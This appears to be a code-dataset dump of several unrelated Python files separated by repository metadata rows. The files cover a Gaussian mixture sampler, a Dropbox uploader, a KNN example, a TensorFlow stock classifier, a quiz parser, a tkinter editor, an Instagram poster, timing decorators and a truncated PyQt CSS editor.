z = np.random.multinomial(num_samples, mix_coeffs)
samples = np.zeros(shape=[num_samples, len(mean[0])])
i_start = 0
for i in range(len(mix_coeffs)):
i_end = i_start + z[i]
samples[i_start:i_end, :] = np.random.multivariate_normal(
mean=np.array(mean)[i, :],
cov=np.diag(np.array(cov)[i, :]),
size=z[i])
i_start = i_end
return samples
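# Illustrative usage sketch (not part of the original module): draw 1000 points
# from a 2-component, 2-D Gaussian mixture:
# samples = gmm_sample(num_samples=1000,
#                      mix_coeffs=(0.5, 0.5),
#                      mean=((0.0, 0.0), (3.0, 3.0)),
#                      cov=((1.0, 1.0), (0.5, 0.5)))  # -> shape (1000, 2)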
| 39.732394
| 98
| 0.611485
| 401
| 2,821
| 4.057357
| 0.246883
| 0.047326
| 0.047941
| 0.053473
| 0.411801
| 0.356484
| 0.209588
| 0.111862
| 0.111862
| 0.081131
| 0
| 0.022967
| 0.259128
| 2,821
| 70
| 99
| 40.3
| 0.755502
| 0.059553
| 0
| 0.111111
| 0
| 0
| 0.023783
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.092593
| false
| 0
| 0.092593
| 0.018519
| 0.296296
| 0.018519
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb1af2b6ba7c64773e3eb0f188fe914ea2ee6f01
| 1,002
|
py
|
Python
|
src/server/api/API_ingest/dropbox_handler.py
|
carlos-dominguez/paws-data-pipeline
|
5c224e1f259c079631df7d3514a873875c633221
|
[
"MIT"
] | 27
|
2019-11-20T20:20:30.000Z
|
2022-01-31T17:24:55.000Z
|
src/server/api/API_ingest/dropbox_handler.py
|
mrcrnkovich/paws-data-pipeline
|
7c0bd4c5f23276f541611cb564f2f5abbb6b9887
|
[
"MIT"
] | 348
|
2019-11-26T20:34:02.000Z
|
2022-02-27T20:28:20.000Z
|
src/server/api/API_ingest/dropbox_handler.py
|
mrcrnkovich/paws-data-pipeline
|
7c0bd4c5f23276f541611cb564f2f5abbb6b9887
|
[
"MIT"
] | 20
|
2019-12-03T23:50:33.000Z
|
2022-02-09T18:38:25.000Z
|
import dropbox
try:
from secrets_dict import DROPBOX_APP
except ImportError:
# Not running locally
print("Couldn't get DROPBOX_APP from file, trying environment **********")
from os import environ
try:
DROPBOX_APP = environ['DROPBOX_APP']
except KeyError:
# Not in environment
# You're SOL for now
print("Couldn't get DROPBOX_APP from file or environment")
class TransferData:
def __init__(self, access_token):
self.access_token = access_token
def upload_file(self, file_from, file_to):
dbx = dropbox.Dropbox(self.access_token)
with open(file_from, 'rb') as f:
dbx.files_upload(f.read(), file_to)
def upload_file_to_dropbox(file_path, upload_path):
access_token = DROPBOX_APP
transfer_data = TransferData(access_token)
file_from = file_path
file_to = upload_path # The full path to upload the file to, including the file name
transfer_data.upload_file(file_from, file_to)
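# Illustrative usage sketch (not part of the original module); the paths are
# hypothetical:
# upload_file_to_dropbox('reports/latest.csv', '/backups/latest.csv')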
| 27.833333
| 89
| 0.691617
| 140
| 1,002
| 4.685714
| 0.378571
| 0.091463
| 0.068598
| 0.045732
| 0.10061
| 0.10061
| 0.10061
| 0.10061
| 0
| 0
| 0
| 0
| 0.228543
| 1,002
| 36
| 90
| 27.833333
| 0.848642
| 0.117764
| 0
| 0.086957
| 0
| 0
| 0.144318
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.130435
| false
| 0
| 0.173913
| 0
| 0.347826
| 0.086957
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb1c95abaf459d4750608d1b3b3b8a20f69d8f30
| 504
|
py
|
Python
|
KNN/sklearn API.py
|
wu-huipeng/-
|
84f681f7488e45c5f357f558defbc27aaf285a16
|
[
"Apache-2.0"
] | 7
|
2019-09-09T08:55:41.000Z
|
2020-02-08T13:24:59.000Z
|
KNN/sklearn API.py
|
wu-huipeng/machine-learning
|
84f681f7488e45c5f357f558defbc27aaf285a16
|
[
"Apache-2.0"
] | null | null | null |
KNN/sklearn API.py
|
wu-huipeng/machine-learning
|
84f681f7488e45c5f357f558defbc27aaf285a16
|
[
"Apache-2.0"
] | null | null | null |
from sklearn.neighbors import KNeighborsClassifier
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
x, y = make_classification(n_samples=1000, n_features=40, random_state=42)  # generate data
x_train, x_test, y_train, y_test = train_test_split(x, y, random_state=42)  # split into train/test sets
knn = KNeighborsClassifier()  # build the model
knn.fit(x_train, y_train)  # train
pred = knn.predict(x_test)  # predictions
score = knn.score(x_test, y_test)  # test accuracy
print(score)  # score = 0.76
| 22.909091
| 81
| 0.759921
| 79
| 504
| 4.594937
| 0.468354
| 0.090909
| 0.077135
| 0.082645
| 0.088154
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030162
| 0.144841
| 504
| 21
| 82
| 24
| 0.812065
| 0.065476
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.3
| 0
| 0.3
| 0.1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb2248e40d3ed11337557c6e7ae9b71e63c167b4
| 3,622
|
py
|
Python
|
BP.py
|
WolfMy/predict_stock
|
7af33404875d19ea93328b8f220d3bd2c0f6d2e5
|
[
"MIT"
] | 1
|
2021-09-28T02:02:05.000Z
|
2021-09-28T02:02:05.000Z
|
BP.py
|
WolfMy/predict_stock
|
7af33404875d19ea93328b8f220d3bd2c0f6d2e5
|
[
"MIT"
] | null | null | null |
BP.py
|
WolfMy/predict_stock
|
7af33404875d19ea93328b8f220d3bd2c0f6d2e5
|
[
"MIT"
] | 1
|
2020-10-13T12:13:43.000Z
|
2020-10-13T12:13:43.000Z
|
import tensorflow as tf
import numpy as np
import pandas as pd
from MACD_RSI import init_train_data
def get_batch(data, label, batch_size, num_epochs):
input_queue = tf.train.slice_input_producer([data, label], num_epochs=num_epochs, shuffle=True, capacity=32)
x_batch, y_batch = tf.train.batch(input_queue, batch_size=batch_size, num_threads=1, capacity=32, allow_smaller_final_batch=False)
return x_batch, y_batch
def BP(data_train, label_train, input_size, num_classes, learning_rate=0.001, batch_size=64, num_epochs=1000):
X = tf.placeholder(tf.float32, shape=[None, input_size])
Y = tf.placeholder(tf.float32, shape=[None, num_classes])
W1 = tf.Variable (tf.random_uniform([input_size,10], 0,1))
B1 = tf.Variable (tf.zeros([1, 10]))
hidden_y1 = tf.nn.relu (tf.matmul(X, W1) + B1)
W2 = tf.Variable (tf.random_uniform([10,7], 0,1))
B2 = tf.Variable (tf.zeros([1, 7]))
hidden_y2 = tf.nn.relu (tf.matmul(hidden_y1, W2) + B2)
W3 = tf.Variable (tf.random_uniform([7, num_classes], 0.1))
B3 = tf.Variable (tf.zeros([1, num_classes]))
final_opt = tf.nn.softmax(tf.matmul(hidden_y2, W3) + B3)
loss = tf.reduce_mean (tf.nn.softmax_cross_entropy_with_logits (labels = Y, logits = final_opt))
train_step = tf.train.AdamOptimizer(learning_rate).minimize(loss)
correct_prediction = tf.equal(tf.argmax(final_opt,1), tf.argmax(Y,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float"))
x_batch, y_batch = get_batch(data_train, label_train, batch_size, num_epochs)
with tf.Session() as sess:
sess.run(tf.local_variables_initializer())
sess.run(tf.global_variables_initializer())
        # Start the coordinator
coord = tf.train.Coordinator()
        # Use start_queue_runners to launch the queue-filling threads
threads = tf.train.start_queue_runners(sess, coord)
epoch = 0
try:
while not coord.should_stop():
                # Fetch batch_size samples and labels for one training batch
batch_input, batch_label = sess.run([x_batch, y_batch])
sess.run (train_step, feed_dict = {X: batch_input, Y: batch_label})
if epoch % 200 == 0 :
train_accuracy = sess.run(accuracy, feed_dict = {X: batch_input, Y: batch_label})
#test_accuracy = sess.run(accuracy, feed_dict = {X: data_test, Y: label_test})
#print ("step : %d, training accuracy = %g, test_accuracy = %g " % (epoch, train_accuracy, test_accuracy))
print ("step : %d, training accuracy = %g " % (epoch, train_accuracy))
print("loss:", sess.run(loss, feed_dict={X: batch_input, Y: batch_label}))
epoch = epoch + 1
        except tf.errors.OutOfRangeError:  # raised once num_epochs is exhausted
print("---Train end---")
finally:
            # The coordinator signals all threads to terminate
coord.request_stop()
            coord.join(threads)  # join the launched threads and wait for them to finish
print('---Programm end---')
        # After training completes, record train_accuracy and return it
train_accuracy = sess.run(accuracy, feed_dict = {X: batch_input, Y: batch_label})
return train_accuracy
start_date = '2018-11-20'
end_date = '2019-03-01'
stock_list = ['603000', '002230', '300492', '601688']
df = pd.DataFrame(stock_list, columns=['stock'])
train_acc = []
for stock in stock_list:
data, label = init_train_data(stock, start_date, end_date)
train_acc.append(BP(data, label, input_size=2, num_classes=3, learning_rate=0.001, batch_size=32))
df['train_acc'] = train_acc
print(df.sort_values(['train_acc'], ascending=False))
| 48.293333
| 134
| 0.655163
| 511
| 3,622
| 4.405088
| 0.311155
| 0.021324
| 0.031986
| 0.021324
| 0.257663
| 0.166148
| 0.092403
| 0.078187
| 0.051533
| 0.051533
| 0
| 0.038353
| 0.215351
| 3,622
| 75
| 135
| 48.293333
| 0.753695
| 0.099117
| 0
| 0.034483
| 0
| 0
| 0.044253
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034483
| false
| 0
| 0.068966
| 0
| 0.137931
| 0.086207
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb24589362ad5872b751372ecb28f328c4ec3892
| 1,907
|
py
|
Python
|
utils.py
|
psergal/quiz
|
9420db013a4ca0662471f716ed5fc1f9cfb2502a
|
[
"MIT"
] | null | null | null |
utils.py
|
psergal/quiz
|
9420db013a4ca0662471f716ed5fc1f9cfb2502a
|
[
"MIT"
] | null | null | null |
utils.py
|
psergal/quiz
|
9420db013a4ca0662471f716ed5fc1f9cfb2502a
|
[
"MIT"
] | null | null | null |
import argparse
from pathlib import Path
import random
def get_args():
parser = argparse.ArgumentParser(description='Launching VK chat bot')
parser.add_argument('-m', '--memcached_server', default='redis-12388.c52.us-east-1-4.ec2.cloud.redislabs.com',
help='Set the server to store and retrieve questions and answers. Redislabs set default')
parser.add_argument('-c', '--memcached_charset', default='utf-8',
help='Set the charset for the stored values. utf-8 set default')
arguments = parser.parse_args()
return arguments
def get_quiz_questions():
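    # Pick a random file from quiz-questions/ (KOI8-R encoded), index every
    # line that opens a question block ('Вопрос ... :'), then collect the
    # question text up to the first blank line and the answer text between
    # the 'Ответ:' marker and the next blank line.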
local_path = Path('.')
quiz_path = local_path / 'quiz-questions'
quiz_files = list(quiz_path.glob('*.*'))
quiz_file = random.choice(quiz_files)
quiz_lines = quiz_file.read_text(encoding='KOI8-R').splitlines()
question_lines_dict = {line_number: file_quiz_line
for line_number, file_quiz_line in enumerate(quiz_lines, start=1)
if file_quiz_line.startswith('Вопрос') and file_quiz_line.endswith(':')}
for quiz_question in question_lines_dict:
question_text, answer_text = '', ''
q_flag = True
for quiz_text_line in quiz_lines[quiz_question::]:
if quiz_text_line and q_flag:
question_text = f'{question_text}{quiz_text_line} '
elif q_flag:
q_flag = False
continue
if not quiz_text_line and not q_flag:
break
elif quiz_text_line.startswith('Ответ:'):
continue
elif not q_flag:
answer_text = f'{answer_text}{quiz_text_line} '
question_lines_dict[quiz_question] = [question_lines_dict.get(quiz_question),
{'q': question_text, 'a': answer_text}]
return question_lines_dict
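A minimal usage sketch for the parser above, assuming it runs next to a quiz-questions directory of KOI8-R encoded files (each value in the returned dict is a [header, {'q': ..., 'a': ...}] pair):
if __name__ == '__main__':
    questions = get_quiz_questions()
    for line_number, (header, qa) in questions.items():
        print(header)         # e.g. 'Вопрос 1:'
        print('Q:', qa['q'])
        print('A:', qa['a'])
        break  # show just the first parsed question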
| 44.348837
| 114
| 0.624541
| 239
| 1,907
| 4.690377
| 0.372385
| 0.026762
| 0.064228
| 0.032114
| 0.039251
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010182
| 0.278972
| 1,907
| 42
| 115
| 45.404762
| 0.805091
| 0
| 0
| 0.052632
| 0
| 0.026316
| 0.187205
| 0.058207
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.078947
| 0
| 0.184211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb2468353432def77628e6adb7da27b64ec4c1b6
| 2,684
|
py
|
Python
|
text-editor.py
|
Shubham05178/Text-Editor
|
82fff346880bb9e2088a16af20695bb46d68d29a
|
[
"MIT"
] | 1
|
2021-09-24T16:13:14.000Z
|
2021-09-24T16:13:14.000Z
|
text-editor.py
|
Shubham05178/Text-Editor
|
82fff346880bb9e2088a16af20695bb46d68d29a
|
[
"MIT"
] | null | null | null |
text-editor.py
|
Shubham05178/Text-Editor
|
82fff346880bb9e2088a16af20695bb46d68d29a
|
[
"MIT"
] | null | null | null |
#Author Shubham Nagaria. ShubhamLabs.
#Coder.
#subhamnagaria@gmail.com
import tkinter
from tkinter import *
from tkinter import Tk, scrolledtext, filedialog, messagebox
root = Tk(className=" TextEditor-ShubhamLabs") #name your texteditor in quotes
textPad = scrolledtext.ScrolledText(root, width=100, height=80)
#Defining Menu bar and sub-commands
def about():
win = Tk()
win.wm_title("About")
frame1 = Frame(
master = win,
bg = '#800000'
)
frame1.pack(fill='both', expand='yes')
editArea = Text(
master = frame1,
wrap = WORD,
width = 30,
height = 15)
#Don't use widget.place(), use pack or grid instead, since
# They behave better on scaling the window -- and you don't
# have to calculate it manually!
editArea.pack(padx=10, pady=10, fill=BOTH, expand=True)
# Adding some text in About.
editArea.insert(INSERT,
"""
This Software was created by Shubham Nagaria as a final year undergrad at GLA University,Mathura. This software was programmed in Python 3.5. Tkinter was used to create GUI version. subhamnagaria@gmail.com, mail me for doubts, queries or any other stuff.
""")
    editArea.configure(state='disabled') #To make ScrolledText read-only, unlike our root window.
win.mainloop()
def save_file():
file = filedialog.asksaveasfile(mode='w')
    if file is not None:
# chop the last character from get, as an added extra return
data = textPad.get('1.0', END+'-1c')
file.write(data)
file.close()
def open_file():
file = filedialog.askopenfile(parent=root,mode='rb',title='Select file')
    if file is not None:
contents = file.read()
textPad.insert('1.0',contents)
file.close()
def exit_file():
if messagebox.askokcancel("Exit", """Are you sure you want to exit?
Shubhamlabs thanks you for using our Code."""):
root.destroy()
def begin(): #just to ensure code is running correctly.
print ("Shubhamlabs thanks you for using our code.")
#Adding menus to our text editor.
menu = Menu(root)
root.config(menu=menu)
file_menu = Menu(menu)
menu.add_cascade(label="File", menu=file_menu)
file_menu.add_command(label="New", command=begin)
file_menu.add_command(label="Open", command=open_file)
file_menu.add_command(label="Save", command=save_file)
file_menu.add_separator()
file_menu.add_command(label="Exit", command=exit_file)
help_menu = Menu(menu)
menu.add_cascade(label="Help", menu=help_menu)
help_menu.add_command(label="About", command=about)
textPad.pack()#we pack everything :P
root.mainloop() #we run script in loop.
| 32.731707
| 256
| 0.676975
| 374
| 2,684
| 4.791444
| 0.486631
| 0.035714
| 0.030692
| 0.053013
| 0.125
| 0.073661
| 0.073661
| 0
| 0
| 0
| 0
| 0.013641
| 0.207899
| 2,684
| 81
| 257
| 33.135802
| 0.829257
| 0.201192
| 0
| 0.072727
| 0
| 0
| 0.122758
| 0.012332
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.054545
| 0
| 0.145455
| 0.018182
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb28158cf8145cabc88ee46d040cb82c54962f04
| 787
|
py
|
Python
|
fn/instaAPI.py
|
elsou/ETSE-Warbot
|
4fd5351688e3cd81d9eeed50586027830dba0c5b
|
[
"MIT"
] | 2
|
2021-11-09T23:14:53.000Z
|
2021-11-11T01:09:28.000Z
|
fn/instaAPI.py
|
elsou/etse-warbot
|
4fd5351688e3cd81d9eeed50586027830dba0c5b
|
[
"MIT"
] | null | null | null |
fn/instaAPI.py
|
elsou/etse-warbot
|
4fd5351688e3cd81d9eeed50586027830dba0c5b
|
[
"MIT"
] | null | null | null |
from instabot import Bot
import os
import shutil
import time
# Given a tweet (str) and an image (str '*.jpeg'), post the content to Instagram
def upload(tweet, imaxe):
clean_up()
bot = Bot()
    bot.login(username="username", password="password")  # placeholder credentials
time.sleep(1)
bot.upload_photo(imaxe, caption=tweet)
# ...
def clean_up():
    config_dir = "../config"  # renamed from `dir` to avoid shadowing the builtin
    remove_me = r"imgs\img.jpg.REMOVE_ME"  # raw string so the backslash is unambiguous
    # checking whether the config folder exists or not
    if os.path.exists(config_dir):
        try:
            # removing it so we can upload a new image
            shutil.rmtree(config_dir)
        except OSError as e:
            print("Error: %s - %s." % (e.filename, e.strerror))
    if os.path.exists(remove_me):
        src = os.path.realpath(r"imgs\img.jpg")
        os.rename(remove_me, src)
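A minimal usage sketch; the credentials above are placeholders and the tweet text and image path below are hypothetical:
if __name__ == '__main__':
    # assumes an imgs/img.jpg file exists next to the script
    upload("Hello from the warbot!", "imgs/img.jpg")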
| 23.848485
| 76
| 0.617535
| 112
| 787
| 4.276786
| 0.589286
| 0.066806
| 0.041754
| 0.058455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001704
| 0.25413
| 787
| 32
| 77
| 24.59375
| 0.81431
| 0.205845
| 0
| 0
| 0
| 0
| 0.118699
| 0.035772
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0.047619
| 0.190476
| 0
| 0.285714
| 0.047619
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb29a12d8ace63ae0afef58e7d2a5734abf0e3c4
| 2,088
|
py
|
Python
|
memories/api/utils.py
|
marchelbling/memories-api
|
e82d6c6ae2b7873fc35ebb301fc073e3ef968a1e
|
[
"MIT"
] | null | null | null |
memories/api/utils.py
|
marchelbling/memories-api
|
e82d6c6ae2b7873fc35ebb301fc073e3ef968a1e
|
[
"MIT"
] | null | null | null |
memories/api/utils.py
|
marchelbling/memories-api
|
e82d6c6ae2b7873fc35ebb301fc073e3ef968a1e
|
[
"MIT"
] | null | null | null |
import time
import logging
from functools import wraps
logging.basicConfig(level=logging.INFO,
format='[%(asctime)s] [%(levelname)s] %(message)s')
def timehttp(endpoint):
@wraps(endpoint)
def timed(self, request, response):
start = time.time()
result = endpoint(self, request, response)
logging.info("{uri} => {status} {response} in {timing:.3f}s"
.format(uri=request.uri,
status=response.status,
response=response.body,
timing=time.time() - start))
return result
return timed
def timeit(func):
@wraps(func)
def timed(*args, **kwargs):
argument_names = func.func_code.co_varnames[:func.func_code.co_argcount]
arguments = args[:len(argument_names)]
defaults = func.func_defaults or ()
arguments += defaults[len(defaults) - (func.func_code.co_argcount - len(arguments)):]
params = zip(argument_names, arguments)
arguments = arguments[len(argument_names):]
if arguments: params.append(('args', arguments))
if kwargs: params.append(('kwargs', kwargs))
call = func.func_name + '(' + ', '.join('%s=%r' % p for p in params) + ')'
start = time.time()
result = func(*args, **kwargs)
logging.info("{call} = {result} [{timing:.3f}s]"
.format(call=call,
result=unicode(result, 'utf8', errors='ignore').encode('utf8'),
timing=time.time() - start))
return result
return timed
def safe_utf8(string):
def safe_decode(string):
try:
return unicode(string, 'utf8')
except UnicodeError:
try:
return unicode(string, 'latin1')
except UnicodeError:
return unicode(string, 'utf8', 'replace')
if string is None:
return string
if not isinstance(string, unicode):
string = safe_decode(string)
return string.encode('utf8')
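Note that func_code, func_name and unicode are Python 2 attributes, so these helpers target Python 2. A minimal Python 2 usage sketch of the timeit decorator (function name and output are illustrative):
@timeit
def greet(name):
    return 'hello ' + name

greet('world')  # logs something like: greet(name='world') = hello world [0.000s]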
| 33.677419
| 93
| 0.561782
| 220
| 2,088
| 5.263636
| 0.322727
| 0.034542
| 0.031088
| 0.036269
| 0.115717
| 0.07772
| 0.07772
| 0.07772
| 0.07772
| 0
| 0
| 0.00625
| 0.310345
| 2,088
| 61
| 94
| 34.229508
| 0.797917
| 0
| 0
| 0.235294
| 0
| 0
| 0.08477
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0
| 0.058824
| 0
| 0.352941
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb2abd56368d34ecbc07a95fe8f4a470ff486455
| 24,641
|
py
|
Python
|
cssedit/editor/gui_qt.py
|
albertvisser/cssedit
|
e17ed1b43a0e4d50bfab6a69da47b92cd3213724
|
[
"MIT"
] | null | null | null |
cssedit/editor/gui_qt.py
|
albertvisser/cssedit
|
e17ed1b43a0e4d50bfab6a69da47b92cd3213724
|
[
"MIT"
] | null | null | null |
cssedit/editor/gui_qt.py
|
albertvisser/cssedit
|
e17ed1b43a0e4d50bfab6a69da47b92cd3213724
|
[
"MIT"
] | null | null | null |
"""cssedit: PyQt specific stuff
"""
import sys
import os
import PyQt5.QtWidgets as qtw
import PyQt5.QtGui as gui
import PyQt5.QtCore as core
from .cssedit import parse_log_line, get_definition_from_file
class MainGui(qtw.QMainWindow):
"""Hoofdscherm van de applicatie
"""
def __init__(self, master, app, title='', pos=(0, 0), size=(800, 500)):
self.master = master
if not app:
selfcontained = True
self.app = qtw.QApplication(sys.argv)
else:
self.app = app
print('in csseditor.maingui, app=', self.app)
super().__init__()
self.set_window_title()
if self.master.app_iconame:
self.setWindowIcon(gui.QIcon(self.master.app_iconame))
offset = 40 if os.name != 'posix' else 10
self.move(pos[0] + offset, pos[1] + offset)
self.resize(size[0], size[1])
self.statusbar = self.statusBar()
self.tree = TreePanel(self)
self.setCentralWidget(self.tree)
def create_menu(self, menudata):
"""bouw het menu en de meeste toolbars op"""
menubar = self.menuBar()
self.menus = {} # we may need this if we need to do something with specific menus later
for item, data in menudata:
menu = menubar.addMenu(item)
self.menus[item] = menu
for menudef in data:
if not menudef:
menu.addSeparator()
continue
label, handler, shortcut, icon, info = menudef
if isinstance(handler, tuple): # TODO: find a nicer way
submenu = menu.addMenu(label)
for item in handler:
# define submenu options
pass
continue
if icon:
action = qtw.QAction(gui.QIcon(os.path.join(HERE, icon)), label,
self)
## if not toolbar_added:
## toolbar = self.addToolBar(item)
## toolbar.setIconSize(core.QSize(16, 16))
## toolbar_added = True
## toolbar.addAction(action)
else:
action = qtw.QAction(label, self)
## if item == menudata[3][0]:
## if label == '&Undo':
## self.undo_item = action
## elif label == '&Redo':
## self.redo_item = action
if shortcut:
action.setShortcuts([x for x in shortcut.split(",")])
## if info.startswith("Check"):
## action.setCheckable(True)
if info:
action.setStatusTip(info)
action.triggered.connect(handler)
                    # action.triggered.connect(handler) does not work here
if label:
menu.addAction(action)
self.master.actiondict[label] = action
def just_show(self):
"""standalone aansturen
"""
self.show()
sys.exit(self.app.exec_())
def set_modality_and_show(self, modal):
"""blokkerend gedrag instellen als aangestuurd vanuit bv. Htmledit
"""
print('in csseditorgui.set_modality_and_show, modal is', modal)
modality = core.Qt.ApplicationModal if modal else core.Qt.NonModal
self.setWindowModality(modality)
self.show()
def show_message(self, text, title=""):
"show a message in a box with a title"
title = title or self.master.app_title
qtw.QMessageBox.information(self, title, text)
def show_statusmessage(self, text):
"set the message at the bottom of the window"
self.statusbar.showMessage(text)
def close(self):
"""reimplemented method from superclass
"""
self.master.close()
super().close()
def set_window_title(self, title=''):
"set the title for the GUI window"
title = title or self.master.app_title
self.setWindowTitle(title)
def set_waitcursor(self, on):
"set cursor to clock or back to default"
if on:
self.app.setOverrideCursor(gui.QCursor(core.Qt.WaitCursor))
else:
self.app.restoreOverrideCursor()
def show_save_dialog(self, start, filter):
"get name of file to save"
return qtw.QFileDialog.getSaveFileName(self, self.master.app_title, start, filter)[0]
def show_open_dialog(self, start, filter):
"get name of file to open"
return qtw.QFileDialog.getOpenFileName(self, self.master.app_title, start, filter)[0]
def get_input_text(self, prompt):
"get text from user input"
return qtw.QInputDialog.getText(self, self.master.app_title, prompt)
def get_input_choice(self, prompt, choices, editable=False):
"get user to choice from a list of options"
return qtw.QInputDialog.getItem(self, self.master.app_title, prompt, choices, editable)
def show_dialog(self, cls, *args):
"show and return the results of a dialog"
edt = cls(self, *args).exec_()
if edt == qtw.QDialog.Accepted:
return True, self.dialog_data
else:
return False, None
class TreePanel(qtw.QTreeWidget):
"Tree structure"
def __init__(self, parent):
self.parent = parent
super().__init__()
self.setColumnCount(2)
self.hideColumn(1)
self.headerItem().setHidden(True)
## self.setAcceptDrops(True)
## self.setDragEnabled(True)
self.setSelectionMode(self.SingleSelection)
## self.setDragDropMode(self.InternalMove)
## self.setDropIndicatorShown(True)
self.setUniformRowHeights(True)
def selectionChanged(self, newsel, oldsel):
"""wordt aangeroepen als de selectie gewijzigd is
de tekst van de oude selectie wordt in de itemdict geactualiseerd
en die van de nieuwe wordt erin opgezocht en getoond"""
# helaas zijn newsel en oldsel niet makkelijk om te rekenen naar treeitems
# self.parent.check_active()
# h = self.currentItem()
# self.parent.activate_item(h)
def dropEvent(self, event):
"""wordt aangeroepen als een versleept item (dragitem) losgelaten wordt over
een ander (dropitem)
Het komt er altijd *onder* te hangen als laatste item
deze methode breidt de Treewidget methode uit met wat visuele zaken
"""
# copied from DocTree but not implemented yet
# dragitem = self.selectedItems()[0]
# dragparent = dragitem.parent()
# dropitem = self.itemAt(event.pos())
# if not dropitem:
# # ## event.ignore()
# return
# qtw.QTreeWidget.dropEvent(self, event)
# count = self.topLevelItemCount()
# if count > 1:
# for ix in range(count):
# if self.topLevelItem(ix) == dragitem:
# self.takeTopLevelItem(ix)
# self.oldparent.insertChild(self.oldpos, dragitem)
# self.setCurrentItem(dragitem)
# break
# return
# self.parent.set_project_dirty(True)
# self.setCurrentItem(dragitem)
# dropitem.setExpanded(True)
super().dropEvent(event)
def mousePressEvent(self, event):
"""remember the current parent in preparation for "canceling" a dragmove
"""
# copied from DocTree but not implemented yet
# xc, yc = event.x(), event.y()
# item = self.itemAt(xc, yc)
# if item:
# self.oldparent, self.oldpos = self._getitemparentpos(item)
super().mousePressEvent(event)
def mouseReleaseEvent(self, event):
"for showing a context menu"
# copied from DocTree but not implemented yet
# if event.button() == core.Qt.RightButton:
# xc, yc = event.x(), event.y()
# item = self.itemAt(xc, yc)
# if item:
# self.create_popupmenu(item)
# return
super().mouseReleaseEvent(event)
def keyReleaseEvent(self, event):
"also for showing a context menu"
# copied from DocTree but not implemented yet
# if event.key() == core.Qt.Key_Menu:
# item = self.currentItem()
# self.create_popupmenu(item)
# return
super().keyReleaseEvent(event)
def create_popupmenu(self, item):
"""create a menu in the right place"""
# copied from DocTree but not implemented yet
# menu = qtw.QMenu()
# for action in self.parent.notemenu.actions():
# act = menu.addAction(action)
# if item == self.parent.root and action.text() in ('&Add', '&Delete',
# '&Forward', '&Back'):
# action.setEnabled(False)
# menu.addSeparator()
# for action in self.parent.treemenu.actions():
# menu.addAction(action)
# if item == self.parent.root:
# action.setEnabled(False)
# menu.exec_(self.mapToGlobal(self.visualItemRect(item).center()))
# if item == self.parent.root:
# for action in self.parent.notemenu.actions():
# if item == self.parent.root and action.text() in ('&Add', '&Delete',
# '&Forward', '&Back'):
# action.setEnabled(True)
# for action in self.parent.treemenu.actions():
# action.setEnabled(True)
def remove_root(self):
self.takeTopLevelItem(0)
def init_root(self):
self.root = qtw.QTreeWidgetItem()
self.root.setText(0, "(untitled)")
self.addTopLevelItem(self.root)
def set_root_text(self, text):
self.root.setText(0, text)
def get_root(self):
return self.root
def activate_rootitem(self):
self.setCurrentItem(self.root)
def set_activeitem(self, item):
self.activeitem = item
def set_focus(self):
self.setFocus()
def add_to_parent(self, titel, parent, pos=-1):
"""shortcut for new_treeitem + add_subitem
"""
titel = titel.rstrip()
new = self.new_treeitem(titel)
self.add_subitem(parent, new, pos)
return new
def setcurrent(self, item):
